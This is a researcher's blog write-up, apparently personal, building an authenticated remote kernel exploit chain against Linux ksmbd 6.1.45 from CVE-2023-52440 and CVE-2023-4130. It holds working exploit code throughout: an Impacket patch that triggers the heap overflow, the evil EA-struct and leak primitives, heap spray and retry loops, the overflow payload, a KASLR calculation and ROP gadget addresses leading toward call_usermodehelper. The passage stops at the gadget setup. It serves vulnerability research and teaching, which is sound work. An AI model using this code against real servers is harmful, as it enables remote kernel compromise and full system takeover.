Will's Root: 2025

What would a vulnerability researcher's magnum opus be? For me, it would be a 0-click 0-day exploit chain against a popular platform or device in the modern era. No interaction needed, system pwned.

Unfortunately, this is a difficult task to achieve these days. So towards the end of my post-grad summer, I decided to practice designing a stable (> 95% success rate) authenticated 0-click exploit from real-world CVEs. As you likely guessed from the title, we are targeting ksmbd, or Kernel SMB3 Daemon. Yes, you heard that right, Linux has a kernelspace SMB3 server because userspace just isn’t enough. Thank you, Microsoft!

The beginning of many remote bugs...

Here is a demo of my end to end exploit (at a 2x speedup)!

Onto the writeup now.

ksmbd makes sense as a target for a multitude of reasons.

It is reachable over the network
It has a ton of vulnerabilities, including a 0-click RCE exploit from Guillaume Teissier and Quentin Minster of Thalium (end of 2022)
Many of these vulnerabilities are not hard to reach and are quite surprising to appear in such abundance in the modern era
There has been existing research on attacking ksmbd: the aforementioned 0-click has a whole online video, which I highly recommend watching. I myself found an unauthenticated remote DoS back in 2023 with Hrvoje Misetic, and there are a multitude of other posts discussing vulnerabilities, from pwning.tech to Doyensec
ZDI also has a nice collection of advisories for the vulnerabilities as well that gave me a quick overview of each CVE’s exploit implications
There may be a lot of existing work on discussing vulnerabilities, but there is only one major presentation as I mentioned earlier... where is the fun in vulnerability research if you don’t write exploits?

I would have to say the only “downside” from a coolness factor is that ksmbd is rarely deployed in production. To every sysadmin out there, keep it this way for your own sake.

Choosing the Bugs

I perused the ZDI 2024 advisories and decided upon two CVEs. Network RCE exploits generally require multiple bugs, and each bug has to provide a very useful primitive, since we no longer have the ability to locally manipulate the internal kernel state through syscalls. In a way, they remind me of the notorious heap note challenges from CTFs.

My target was 6.1.45, a 2 year out-of-date version, running on a single x86_64 core with all the available standard mitigations (SMAP, SMEP, KPTI, KASLR, CONFIG_SLAB_FREELIST_RANDOM, CONFIG_SLAB_FREELIST_HARDENED, etc.). I really hope no one is running this version with ksmbd enabled and exposed…

ZDI-24-229 (CVE-2023-52440) was the first: ksmbd: fix slub overflow in ksmbd_decode_ntlmssp_auth_blob(). This bug was discovered by Pumpkin of DEVCORE. Let us take a look at the patch:

@@ -355,6 +355,9 @@ int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob,
 	if (blob_len < (u64)sess_key_off + sess_key_len)
 		return -EINVAL;
 
+	if (sess_key_len > CIFS_KEY_SIZE)
+		return -EINVAL;
+
 	ctx_arc4 = kmalloc(sizeof(*ctx_arc4), GFP_KERNEL);
 	if (!ctx_arc4)
 		return -ENOMEM;

This vulnerable snippet can be triggered during NTLM authentication through a SMB2_SESSION_SETUP message. Since sess_key_len is user controlled, we can cause an overflow of the fixed size sess_key buffer when executing cifs_arc4_crypt. This is actually quite an easy bug to trigger and gives us a controlled SLUB overflow.

In Impacket (commit 7561038277f4b08a16f37aac886cfe0193e75434), you can trigger this bug by just modifying a single line in getNTLMSSPType3 in ntlm.py. You can set session_key in ntlmChallengeResponse to a blob of any length, and you can achieve a controlled SLUB overflow by running cifs_arc4_crypt on the target payload with sessionBaseKey as the context.

    if version is not None:
        ntlmChallengeResponse['Version'] = version
    ntlmChallengeResponse['ntlm'] = ntResponse
    if encryptedRandomSessionKey is not None:
        if os.getenv('IMPACKET_OVERFLOW_NTLM'):
            print('making evil session_key')
            ctx = ARC4Ctx()
            cifs_arc4_setkey(ctx, sessionBaseKey, len(sessionBaseKey))
            data = base64.b64decode(os.getenv('IMPACKET_OVERFLOW_NTLM'))
            ntlmChallengeResponse['session_key'] = cifs_arc4_crypt(ctx, data)
        else:
            ntlmChallengeResponse['session_key'] = encryptedRandomSessionKey

    return ntlmChallengeResponse, exportedSessionKey

Honestly, this is an awesome primitive: unauthenticated remote controlled heap overflow of content and size. Based on the Thalium primitive, this is the equivalent of their “writeheap” primitive. We are restricted to kmalloc-512 with the bug here.
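To see why pre-encrypting the payload gives full control over the overflowed bytes: RC4 is a symmetric stream cipher, so whatever the client runs through the cipher under the session base key comes back unchanged when the server runs the same operation with the same key. The following is a minimal sketch using a textbook RC4 rather than the kernel's cifs_arc4_crypt. The rc4_crypt helper, the key bytes, and the payload are illustrative stand-ins, and CIFS_KEY_SIZE = 40 is an assumption taken from the kernel headers.

```python
def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling followed by keystream XOR."""
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) & 0xFF
        state[i], state[j] = state[j], state[i]

    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + state[i]) & 0xFF
        state[i], state[j] = state[j], state[i]
        out.append(byte ^ state[(state[i] + state[j]) & 0xFF])
    return bytes(out)


CIFS_KEY_SIZE = 40  # assumed size of the fixed sess_key buffer

# Stand-in for sessionBaseKey; in the real exchange both sides derive it.
session_base_key = bytes(range(16))

# Bytes we want to end up on the server heap: fill the buffer, then overflow.
desired = b"Z" * CIFS_KEY_SIZE + b"OVERFLOW" * 8

wire_blob = rc4_crypt(session_base_key, desired)       # sent as session_key
server_view = rc4_crypt(session_base_key, wire_blob)   # result of server-side decryption
overflow_len = len(server_view) - CIFS_KEY_SIZE        # bytes written past the buffer
```

Since the unpatched code never compares sess_key_len against the buffer size, every byte of server_view past the first CIFS_KEY_SIZE bytes lands in whatever follows sess_key in memory.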

Now, we need to find a leakage vector. This vector is actually what downgraded our 0-click from an “unauthenticated” one to an “authenticated” one, just like the Thalium 0-click. We require a primitive that leaks contents back through the response buffers. I decided on ZDI-24-587, which is an authenticated remote leak bug. Pumpkin discovered this yet again and it is assigned CVE-2023-4130. Let us take a look at the commit, which is titled ksmbd: fix wrong next length validation of ea buffer in smb2_set_ea().

diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
index 9849d748934599..7cc1b0c47d0a20 100644
--- a/fs/smb/server/smb2pdu.c
+++ b/fs/smb/server/smb2pdu.c
@@ -2324,9 +2324,16 @@ next:
 			break;
 		buf_len -= next;
 		eabuf = (struct smb2_ea_info *)((char *)eabuf + next);
-		if (next < (u32)eabuf->EaNameLength + le16_to_cpu(eabuf->EaValueLength))
+		if (buf_len < sizeof(struct smb2_ea_info)) {
+			rc = -EINVAL;
 			break;
+		}
+		if (buf_len < sizeof(struct smb2_ea_info) + eabuf->EaNameLength +
+				le16_to_cpu(eabuf->EaValueLength)) {
+			rc = -EINVAL;
+		}
 	} while (next != 0);

 	kfree(attr_name);

Given write access to the SMB share filesystem, a user can write extended attributes onto files, which Linux emulates through xattr in the vfs layer. Utilizing this feature in impacket requires us to use the setInfo function on SMB3 objects with infoType set as SMB2_0_INFO_FILE and fileInfoClass set as SMB2_FULL_EA_INFO.

Looking at the original vulnerable code:

    do {
        if (!eabuf->EaNameLength)
            goto next;

        ksmbd_debug(SMB,
                "name : <%s>, name_len : %u, value_len : %u, next : %u\n",
                eabuf->name, eabuf->EaNameLength,
                le16_to_cpu(eabuf->EaValueLength),
                le32_to_cpu(eabuf->NextEntryOffset));

        if (eabuf->EaNameLength >
            (XATTR_NAME_MAX - XATTR_USER_PREFIX_LEN)) {
            rc = -EINVAL;
            break;
        }

        memcpy(attr_name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN);
        memcpy(&attr_name[XATTR_USER_PREFIX_LEN], eabuf->name,
               eabuf->EaNameLength);
        attr_name[XATTR_USER_PREFIX_LEN + eabuf->EaNameLength] = '\0';
        value = (char *)&eabuf->name + eabuf->EaNameLength + 1;

        if (!eabuf->EaValueLength) {
            rc = ksmbd_vfs_casexattr_len(user_ns,
                             path->dentry,
                             attr_name,
                             XATTR_USER_PREFIX_LEN +
                             eabuf->EaNameLength);

            /* delete the EA only when it exits */
            if (rc > 0) {
                rc = ksmbd_vfs_remove_xattr(user_ns,
                                path->dentry,
                                attr_name);

                if (rc < 0) {
                    ksmbd_debug(SMB,
                            "remove xattr failed(%d)\n",
                            rc);
                    break;
                }
            }

            /* if the EA doesn't exist, just do nothing. */
            rc = 0;
        } else {
            rc = ksmbd_vfs_setxattr(user_ns,
                        path->dentry, attr_name, value,
                        le16_to_cpu(eabuf->EaValueLength), 0);
            if (rc < 0) {
                ksmbd_debug(SMB,
                        "ksmbd_vfs_setxattr is failed(%d)\n",
                        rc);
                break;
            }
        }

next:
        next = le32_to_cpu(eabuf->NextEntryOffset);
        if (next == 0 || buf_len < next)
            break;
        buf_len -= next;
        eabuf = (struct smb2_ea_info *)((char *)eabuf + next);
        if (next < (u32)eabuf->EaNameLength + le16_to_cpu(eabuf->EaValueLength))
            break;

    } while (next != 0);

And the original struct:

struct smb2_ea_info {
    __le32 NextEntryOffset;
    __u8   Flags;
    __u8   EaNameLength;
    __le16 EaValueLength;
    char name[1];
    /* optionally followed by value */
} __packed; /* level 15 Query */

We can see that in the next block, we can trick ksmbd into thinking there are additional smb2_ea_info entries by setting NextEntryOffset to a malicious value, as long as we do not exceed our buffer bounds. However, we can still type-confuse this fake next smb2_ea_info with our controlled data in the current name field to provide us with an evil EaValueLength. This will allow the subsequent ksmbd_vfs_setxattr to store OOB read data of adjacent heap chunks into xattr, which we can fetch with SMB3.queryInfo using the same fileInfoClass. The only limitation is that our leak is somewhat limited due to this nonsensical check, which I am pretty sure is a mistake given the context. It requires the sum of our type-confused EaNameLength and EaValueLength be under the next value. Regardless, we can still achieve some substantial leaks from this. This is the equivalent of the “writeleak” primitive from the Thalium 0-click.

I constructed the following make_evil primitive to construct malicious smb2_ea_info structs for me:

# will leak -0x10 less
def make_evil(size):
    assert(size >= 0x20)
    # 12 bytes left till size after this
    evil_ea_name = b'evil.name' + b''.ljust(size - 12 - 9 + 1 - 12, b'A') + b'\x00\x00\x00'
    evil_value_name = p32(0) + p8(0) + p8(3) + p16(size - 0x10) + b'oof\x00'
    evil_entry = FILE_FULL_EA_INFORMATION()
    evil_entry['NextEntryOffset'] = size - 12
    evil_entry['Flags'] = 0
    evil_entry['EaNameLength'] = len(evil_ea_name) - 1
    evil_entry['EaValueLength'] = len(evil_value_name)
    evil_entry['EaName'] = evil_ea_name
    evil_entry['EaValue'] = evil_value_name
    return evil_entry

This structure is inlined with smb request structures (more on this later) in ksmbd, so we construct the name buffer to pad this request allocation to size to leak size - 0x10 bytes. If you look at this carefully, we point NextEntryOffset to the value buffer to type confuse it as another smb2_ea_info structure. The fake EaNameLength and fake EaValueLength are all chosen to pass the nonsensical check.

The evil smb2_ea_info object
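The effect of the old check versus the patched one can be modeled offline. The sketch below is not the exploit code: it rebuilds the same byte layout as make_evil with plain struct packing (padding bytes differ, lengths match), then replays only the "advance to the next entry" logic from smb2_set_ea. The helper names build_evil_entry and walk_second_entry are made up for illustration, and size is kept small here so the name length fits the one-byte field of this simplified packer.

```python
import struct

# NextEntryOffset (u32), Flags (u8), EaNameLength (u8), EaValueLength (u16)
EA_HEADER = struct.Struct("<IBBH")
SIZEOF_EA_INFO = EA_HEADER.size + 1  # packed struct includes name[1]


def build_evil_entry(size: int) -> bytes:
    """Lay out one real entry whose value doubles as a fake second entry."""
    fake_entry = EA_HEADER.pack(0, 0, 3, size - 0x10) + b"oof\x00"  # 12 bytes
    name = b"evil.name".ljust(size - EA_HEADER.size - len(fake_entry) - 1, b"A")
    header = EA_HEADER.pack(size - len(fake_entry), 0, len(name), len(fake_entry))
    return header + name + b"\x00" + fake_entry


def walk_second_entry(buf: bytes, patched: bool):
    """Return the (start, end) range the second entry's value would cover,
    or None if the length validation rejects it."""
    buf_len = len(buf)
    next_off = EA_HEADER.unpack_from(buf, 0)[0]
    if next_off == 0 or buf_len < next_off:
        return None
    buf_len -= next_off
    _, _, name_len, value_len = EA_HEADER.unpack_from(buf, next_off)
    if patched:
        # Post-fix logic: the remaining buffer must hold the whole entry.
        if buf_len < SIZEOF_EA_INFO + name_len + value_len:
            return None
    else:
        # Pre-fix logic: compares against `next`, not the remaining length.
        if next_off < name_len + value_len:
            return None
    value_start = next_off + EA_HEADER.size + name_len + 1
    return value_start, value_start + value_len


entry = build_evil_entry(0x40)
old_range = walk_second_entry(entry, patched=False)
new_range = walk_second_entry(entry, patched=True)
```

With size = 0x40 the old check accepts the fake entry and its value range starts exactly at the end of the 0x40-byte buffer and runs for size - 0x10 bytes, which is the out-of-bounds region that ends up stored in the xattr. The patched check returns None for the same input.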

Using make_evil, I can construct a leak primitive.

def leak(leaker, tid, fid, amount):
    # can't arbitrarily leak because of this nonsensical check
    # https://elixir.bootlin.com/linux/v6.1.45/source/fs/smb/server/smb2pdu.c#L2343
    entries = [make_evil(amount-0x65)]
    entries = [e.getData() for e in entries]
    leaker.setInfo(
        tid, fid,
        inputBlob=b''.join(entries),
        infoType=SMB2_0_INFO_FILE,
        fileInfoClass=SMB2_FULL_EA_INFO
    )
    result = leaker.queryInfo(
        tid, fid,
        fileInfoClass=SMB2_FULL_EA_INFO
    )
    _, leak = deserialize_ea(result)
    leak = leak[2:]
    dump_x_gx(leak)
    return leak

While this will leak kernel heap contents, the next controlled allocation almost never lands where this leaky request was allocated, so we cannot use it to reliably predict the exact heap layout.

To summarize, on Linux 6.1.45 (the fix for the leak bug was backported in 6.1.46), we can pwn ksmbd through users with write access to a share. I consider this an authenticated 0-click as you would need user credentials, but I am sure that there is at least one sysadmin out there who allows anonymously writeable shares.

Here is the sample ksmbd.conf file I used to simulate a vulnerable system.

[CompanyShare]
    ; share parameters
    force user = fossboss
    path = /CompanyShare
    read only = no

Kernel slabs are also technically per-CPU so I did most of my development on a single core setup. The approach I present applies to multi-core setups though, at the cost of some speed (and stability issues at the end). For what it's worth, the exploit successfully worked with 2 cores too.

ksmbd Crash Course + Thalium's Strategy

Before continuing onto the exploit, I shall provide an extremely high-level overview of some important ksmbd behaviors, and discuss the changes in exploit strategies since the Thalium 0-click.

The two most important structs in our exploit are ksmbd_conn (kmalloc-1k) and ksmbd_session (kmalloc-512). If you are unfamiliar with the Linux slub allocator, I recommend this presentation. There is a plethora of other structs in this subsystem, but I did not need any of them for the exploit.

ksmbd operates from kernel worker threads. On a new tcp connection, a ksmbd_conn object is allocated through kzalloc and the kernel calls ksmbd_conn_handler_loop in a new thread. The request buffer has a dynamic size and is allocated in this function. This is useful because smb2_ea_info is allocated inline in this request, providing us with a dynamic heap allocation primitive. Sadly, the request is freed right after handling. From my debugging, the initial header before the first smb2_ea_info struct took up 0x65 bytes. Note that by using this primitive in kmalloc-1k to leak adjacent ksmbd_conn contents, we achieve a KASLR bypass, since the object holds pointers into the kernel data section.

Then process_fn from default_conn_ops is called, which subsequently sends the request for processing in a worker thread through ksmbd_server_process_request -> queue_ksmbd_work. Work processing eventually calls __handle_ksmbd_work, which finally dispatches __process_request.

There are many different cmd handlers, such as the one that leads to the OOB read vulnerability. The one we particularly care about is the session setup cmd, which is defined here and creates a ksmbd_session object. This represents a single session in a ksmbd tcp connection, and it is allocated here through kzalloc.

Session setup via NTLM takes place in two parts, as it is a challenge-response protocol. Note that while the session object is allocated during the challenge phase, the SLUB overflow happens in the response part of the protocol, and we can repeatedly re-run that part of the protocol. This will prove extremely useful later on.

Now, let's discuss some changes I observed in ksmbd since the Thalium 0-click.

Because kmalloc-512 is relatively noisy, their exploit relied on something known as compound requests (which was also the source of many ksmbd bugs). This way, multiple sessions could be allocated in one go via a tight loop, with less chance of other interfering allocations. However, when allocating a new session, ksmbd expires other sessions in the connection that have finished authentication, but we wouldn’t be able to do that without first receiving a response due to the challenge-response nature of NTLM.

Another trick in their exploit was tampering with ksmbd_session->id to side-channel out information regarding the results of an overflow (such as which session was affected, etc.). However, at least from my experiments, this is no longer possible since there seems to be a per-connection xarray and a global hash table for tracking sessions.

Thalium also had an awesome heap spray primitive that no longer exists. The idea was to hang the tcp read attempt of the whole request in ksmbd_tcp_readv. Unfortunately, ksmbd limits data reception to 2 attempts now with very short timeout intervals.

Their last trick, which is still applicable today, was for RIP control. They overflowed the nls_table pointer in the ksmbd_session object to redirect it to a forged object with a malicious vtable. Then, during the NTLM response phase (which we can repeatedly run), the following call chain happens: ntlm_authenticate -> session_user -> smb_strndup_from_utf16 -> smb_utf16_bytes, which uses a function pointer to fetch character lengths. However, this pointer now exists in kmalloc-1k as part of ksmbd_conn, so we will need to find a way to transform our memory corruption primitive in kmalloc-512 to affect kmalloc-1k. I did not look for some other target in kmalloc-512, but I'm sure one exists.

Ok, now let’s get to pwning ksmbd.

Our New Strategy

Let’s first analyze how we can spray. For each connection, we can allocate a ksmbd_conn and a ksmbd_session object. How many can we have at once? How long can each connection last?

The answers to those questions are determined by the server_conf module global. max_connections determines the active connection limit, and deadtime determines the timeout. By default, the values were 0x80 and 0x0, respectively, with 0 for the latter representing infinite time. The maximum connection count is good for us because kmalloc-512 and kmalloc-1k only have 16 elements per slab, making it easier to massage the heap with freelist randomization.

However, as I discovered later in the exploit, not only is kmalloc-512 busy, kmalloc-1k is also an active slab, especially due to tcp replies from ksmbd! I have found the kernel kmem trace framework extremely useful for debugging heap noise and highly recommend others try it out (I have used this to debug cross cache attacks in my other recent exploits). Anyways, this was a backtrace I repeatedly saw that was causing activity in kmalloc-1k:

kworker/0:4-302 [000] ..... 94.399734: kmalloc: call_site=tcp_stream_alloc_skb+0x28/0x130 ptr=ffff888102d32000 bytes_req=1024 bytes_alloc=1024 gfp_flags= node=-1 accounted=false
kworker/0:4-302 [000] ..... 94.399741: <stack trace>
 => trace_event_raw_event_kmalloc
 => __kmalloc_node_track_caller
 => __alloc_skb
 => tcp_stream_alloc_skb
 => tcp_sendmsg_locked
 => tcp_sendmsg
 => sock_sendmsg
 => ksmbd_tcp_writev
 => ksmbd_conn_write
 => handle_ksmbd_work
 => process_one_work
 => worker_thread
 => kthread

Luckily, this chunk is often freed after e1000 processing, before other kmalloc-1k allocations.

<idle>-0 [000] ..s2. 94.402376: kfree: call_site=skb_release_data+0x139/0x180 ptr=ffff888102d32000
<idle>-0 [000] ..s2. 94.402395: <stack trace>
 => trace_event_raw_event_kfree
 => kfree
 => skb_release_data
 => __kfree_skb
 => tcp_ack
 => tcp_rcv_established
 => tcp_v4_do_rcv
 => tcp_v4_rcv
 => ip_protocol_deliver_rcu
 => ip_local_deliver_finish
 => ip_sublist_rcv_finish
 => ip_sublist_rcv
 => ip_list_rcv
 => __netif_receive_skb_list_core
 => netif_receive_skb_list_internal
 => napi_complete_done
 => e1000_clean

Generally, these ephemeral allocations didn’t cause too much of an issue during a short window, but I did encounter a lot more instability when expecting the heap state to remain the same over a longer period of time. This means we have to be very precise with the sessions we choose to utilize for triggering primitives in our exploit, rather than blindly gunning for a homerun with a large spray.
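For anyone wanting to quantify this kind of noise, a small script can pair kmalloc and kfree events from the kmem trace output and report how long each chunk stayed allocated. This is a rough sketch, not something from the exploit: it assumes the event line format shown in the two traces above, and the names EVENT_RE and allocation_lifetimes are made up for illustration.

```python
import re

# Matches the event lines from the kmem tracepoints shown above; stack-trace
# continuation lines do not match and are skipped.
EVENT_RE = re.compile(
    r"\s(?P<ts>\d+\.\d+): (?P<kind>kmalloc|kfree): "
    r"call_site=(?P<site>\S+) ptr=(?P<ptr>[0-9a-f]+)"
    r"(?: bytes_req=(?P<req>\d+) bytes_alloc=(?P<alloc>\d+))?"
)


def allocation_lifetimes(lines):
    """Pair each kmalloc with the next kfree of the same pointer.

    Returns a list of (alloc_call_site, bytes_alloc, seconds_alive)."""
    live = {}
    finished = []
    for line in lines:
        match = EVENT_RE.search(line)
        if not match:
            continue
        timestamp = float(match["ts"])
        if match["kind"] == "kmalloc":
            size = int(match["alloc"]) if match["alloc"] else 0
            live[match["ptr"]] = (timestamp, match["site"], size)
        elif match["ptr"] in live:
            start, site, size = live.pop(match["ptr"])
            finished.append((site, size, timestamp - start))
    return finished


sample = [
    "kworker/0:4-302 [000] ..... 94.399734: kmalloc: "
    "call_site=tcp_stream_alloc_skb+0x28/0x130 ptr=ffff888102d32000 "
    "bytes_req=1024 bytes_alloc=1024 gfp_flags= node=-1 accounted=false",
    "kworker/0:4-302 [000] ..... 94.399741: <stack trace>",
    "<idle>-0 [000] ..s2. 94.402376: kfree: "
    "call_site=skb_release_data+0x139/0x180 ptr=ffff888102d32000",
]
lifetimes = allocation_lifetimes(sample)
```

On the sample above, the skb data chunk lives for roughly 2.6 ms, which matches the observation that these allocations are short-lived but can still land in the middle of a longer heap-shaping sequence.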

Remember from earlier that our overflow is in kmalloc-512, but our target pointer to corrupt for vtable hijacking is in kmalloc-1k? We can rely on the overflow bug to overwrite one of the many pointers that ksmbd_session frees in order to trigger an arbitrary free primitive onto kmalloc-1k. In fact, one such pointer is the Preauth_HashValue field, which can be freed in the response phase of session setup. There aren’t checks against misaligned frees from the allocator, so we can now allocate an object with our controlled data to overlap with an existing ksmbd_conn object to overwrite the local_nls field.

Pivoting from kmalloc-512 overflow to kmalloc-1k overwrite

This overflow into ksmbd_session poses some problems, though. When overflowing into the adjacent ksmbd_session struct, many of the fields that follow are overwritten. We must keep this connection alive to avoid a crash in ksmbd_session_destroy. For example, id actually poses a major issue. An incorrect value here leads to a double free, which the allocator catches, so we must also identify this session and keep it alive. I did not look too far into why this is the case, though I assume it has to do with the fact that sessions are tracked in separate structures and an id mismatch causes some sort of desynchronization.

Overflow and corruption of ksmbd_session object

Exploit Development

The first goal is to leak the contents of a ksmbd_session to help us keep the overflowed ksmbd_session in a “valid” state during our operations (aside from disconnection). I first created a leaker connection to achieve this.

def conn():
    return SMBConnection(ADDRESS, TARGET_IP, sess_port=PORT, preferredDialect=SMB2_DIALECT_311, timeout=30000)

def open_file(conn, tid):
    return conn.create(
        tid, FILENAME,
        desiredAccess=FILE_READ_DATA | FILE_WRITE_DATA | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | FILE_READ_EA | FILE_WRITE_EA,
        shareMode=FILE_SHARE_READ | FILE_SHARE_WRITE,
        creationOptions=FILE_NON_DIRECTORY_FILE,
        creationDisposition=FILE_OVERWRITE_IF,
        fileAttributes=FILE_ATTRIBUTE_NORMAL
    )

leaker = conn()
leaker.login(USER, PW, DOMAIN)
leaker = leaker._SMBConnection
assert leaker.getDialect() == SMB2_DIALECT_311

Then, we spam a bunch of ksmbd_session objects left in the first stage of the session request. Normally, Impacket completes the challenge and response in one function, but I broke login apart into login_init and login_finish.

We can identify valid session objects and track the owning connection through the ClientGUID field. By default, impacket uses a random string, but I added a fixed string component of 10 C’s for identification purposes. Now, we can repeatedly allocate connections, attempt a leak, and check for a live connection’s GUID. If none exist, we close all the currently sprayed connections and try again. This spray, check, free loop is a common pattern in this exploit and makes it very reliable.

spray1 = 0x18
spray2 = spray1 + 0x10
spray3 = spray2 + 0x18
spray4 = spray3 + 0x18
conns = [None for i in range(spray4)]

kmalloc512_leak = None
kmalloc512_leak_q = None
kmalloc1k_leak = None
kmalloc1k_leak_q = None
target_conn = None

tid = leaker.connectTree(SHARE)
fid = open_file(leaker, tid)

while True:
    for i in range(spray1):
        log.info(f"spraying conn {i}")
        # struct ksmbd_conn alloc
        conns[i] = conn()
        # struct ksmbd_session alloc
        conns[i]._SMBConnection.login_init(USER, PW, DOMAIN)

    # spray and retry, because of slab noise and slab randomization
    # a bigger kmalloc-1024?, then kmalloc-512, potentially a few other allocs
    log.info('leakage of kmalloc-512')
    kmalloc512_leak = leak(leaker, tid, fid, 0x200)
    kmalloc512_leak_q = extract_qwords(kmalloc512_leak)
    if kmalloc512_leak_q[2] != 0x4343434343434343:
        log.info('leak failed, trying again')
        for i in range(spray1):
            conns[i]._SMBConnection.close_session()
        fid = open_file(leaker, tid)
    else:
        break

0x10 - 0x18 makes sense for a spray parameter due to the fact that both kmalloc-512 and kmalloc-1k only hold 16 items each.
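The spray, check, free pattern can be factored into a small generic helper. This is only a sketch of the control flow under simplifying assumptions: spray_check_free and its three callbacks are hypothetical names, not part of the exploit or of Impacket, and the usage at the bottom simulates a heap that only cooperates on the third try.

```python
from typing import Callable, Optional, Tuple, TypeVar

Batch = TypeVar("Batch")
Result = TypeVar("Result")


def spray_check_free(
    spray: Callable[[], Batch],
    check: Callable[[Batch], Optional[Result]],
    free: Callable[[Batch], None],
    max_attempts: int = 16,
) -> Tuple[Result, Batch, int]:
    """Allocate a batch, test whether the layout is usable, otherwise
    release the batch and try again with a fresh one."""
    for attempt in range(1, max_attempts + 1):
        batch = spray()
        result = check(batch)
        if result is not None:
            # Keep the winning batch alive; the caller still needs it.
            return result, batch, attempt
        free(batch)
    raise RuntimeError(f"no usable layout after {max_attempts} attempts")


# Simulated usage: the "leak" only shows a live object on the third spray.
freed_batches = []
fake_leak_results = iter([None, None, "conn-7"])

found, winning_batch, attempts = spray_check_free(
    spray=lambda: [f"conn-{i}" for i in range(0x18)],
    check=lambda batch: next(fake_leak_results),
    free=freed_batches.append,
)
```

Bounding the number of attempts matters in practice because every failed round still leaves some residue on the target, such as connections that must stay open.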

After leaking a valid ksmbd_session, I reuse the data for the SLUB overflow portion of the exploit. My goal here is not to perform the arbitrary free next, but to identify the overflowed connection (labeled as overflowed_conn in the exploit). This way, I can pinpoint the exact victim connection to narrow the window between freeing and reclaiming with a ksmbd request. The leaked data won't cleanly preserve an overflowed session, but it is enough for it to survive the next step.

While the session id can no longer act as an oracle, corrupting the session state for a subsequent operation that is not echo, negotiation or session setup can act as a substitute. The relevant call chain starts from here, which calls ksmbd_session_lookup_all and makes this check. If we finish session setup on all of the sprayed sessions, and subsequently overflow a connection, we can then attempt a share connect for all of the sprayed sessions. The failed one will respond with an error. We can also repeat this in a loop until an overflow actually happens. The session object from which the overflow happens must remain alive, but we have at least 0x20 chances for this to occur. I have not observed more than 5-6 attempts for a successful overflow as the slab has few objects.

overflowed_conn = None
failed_evils = []
while True:
    evil = conn()
    for i in range(spray1, spray2):
        log.info(f"spraying conn {i}")
        conns[i] = conn()
        conns[i]._SMBConnection.login_init(USER, PW, DOMAIN)

    log.info(f"allocate evil")
    # ksmbd_session allocate
    evil._SMBConnection.login_init(USER, PW, DOMAIN)

    for i in range(spray2, spray3):
        log.info(f"spraying conn {i}")
        conns[i] = conn()
        conns[i]._SMBConnection.login_init(USER, PW, DOMAIN)

    for i in range(spray1, spray3):
        conns[i]._SMBConnection.login_finish()

    # set a potential state as in progress to see if any error
    payload = (b'Z' * 40 + (kmalloc512_leak[0x68:]).ljust(0x200 - 0x68, b'Z') +
               kmalloc512_leak[:0x34]) + p32(1)
    os.environ['IMPACKET_OVERFLOW_NTLM'] = base64.b64encode(payload).decode()
    # note when logging in, a kmalloc-512 allocation is made and then freed for storing cipher stuff
    evil._SMBConnection.login_finish()
    os.environ.pop("IMPACKET_OVERFLOW_NTLM", None)

    for i in range(spray1, spray3):
        try:
            log.info(f'attempting tree connect on {i}')
            conns[i]._SMBConnection.connectTree(SHARE)
        except impacket.smb3.SessionError:
            overflowed_conn = i
            log.info(f'overflowed connection: {overflowed_conn}')
            break

    if overflowed_conn is None:
        # note that we are limited in total attempts in this
        # but we should be able to hit in a few tries at most
        log.info('overflow failed, retrying')
        for i in range(spray1, spray3):
            conns[i]._SMBConnection.close_session()
        failed_evils.append(evil)
    else:
        break

Once we have achieved an overflow against an exploitable heap layout, we can repeat the overflow from the evil session onto the overflowed_conn session to reliably trigger an arbitrary free.

Next, we would need a heap leak to find a ksmbd_conn object as well as a KASLR leak. The ksmbd_conn connection provides both. The srv_mutex field has a linked list that points to itself. There are multiple pointers to kernel data at the start of the object. We can repeat the same strategy as earlier but with an evil smb2_ea_info in kmalloc-1k: we identify whether we have leaked an active connection through the GUID field, and try again otherwise.

while True:
    for i in range(spray3, spray4):
        log.info(f"spraying conn {i}")
        conns[i] = conn()
        conns[i]._SMBConnection.login_init(USER, PW, DOMAIN)

    # a bigger kmalloc-2048?, then kmalloc-1024, potentially a few other allocs
    log.info('leakage of kmalloc-1024')
    kmalloc1k_leak = leak(leaker, tid, fid, 0x400)
    kmalloc1k_leak_q = extract_qwords(kmalloc1k_leak)
    if kmalloc1k_leak_q[0] & 0xffff == 0xdd00:
        guid = (p64(kmalloc1k_leak_q[35]) + p64(kmalloc1k_leak_q[36])).decode()
        print(f'guid is: {guid}')
        for i in range(spray4):
            if guid == conns[i]._SMBConnection.ClientGuid:
                target_conn = i
                log.info(f'found target conn based on guid at {target_conn}')
    if target_conn != None:
        break
    log.info('failed, trying again')
    for i in range(spray3, spray4):
        conns[i]._SMBConnection.close_session()
    fid = open_file(leaker, tid)

With this pointer leaked, we can arbitrarily free a misaligned chunk (named target) above the leaked ksmbd_conn object to prepare for an overwrite by triggering the response phase of session setup. I calculated the offsets of a few gadgets I used to finish the exploit at this point.

target = kmalloc1k_leak_q[6] - 0x30 - 0x1c0
smb311_server_values = kmalloc1k_leak_q[0]
kaslr_base = smb311_server_values - (0xffffffff82fcdd00 - 0xffffffff81000000)
rebase = lambda orig_addr : kaslr_base + (orig_addr - 0xffffffff81000000)

# 0xffffffff810f4533: leave ; ret ;
leave_ret = rebase(0xffffffff810f4533)
# 0xffffffff81031157: pop rdi ; ret ;
pop_rdi = rebase(0xffffffff81031157)
# 0xffffffff8105c524: pop rsi ; ret ;
pop_rsi = rebase(0xffffffff8105c524)
# 0xffffffff810aac72: pop rdx ; ret ;
pop_rdx = rebase(0xffffffff810aac72)
# 0xffffffff81245e83: pop rcx ; ret ;
pop_rcx = rebase(0xffffffff81245e83)
# 0xffffffff811eaf20: pop rsp ; ret ;
pop_rsp = rebase(0xffffffff811eaf20)
'''
x/50gx 0xffffffff82e5ee00
0xffffffff82e5ee00 <envp.0>:    0xffffffff827e612a      0xffffffff827e6131
0xffffffff82e5ee10 <envp.0+16>: 0xffffffff82843918      0x0000000000000000
'''
envp = rebase(0xffffffff82e5ee00)
call_usermodehelper = rebase(0xffffffff810e9e40)
msleep = rebase(0xffffffff8115ffc0)

log.info(f'kaslr: {hex(kaslr_base)}')
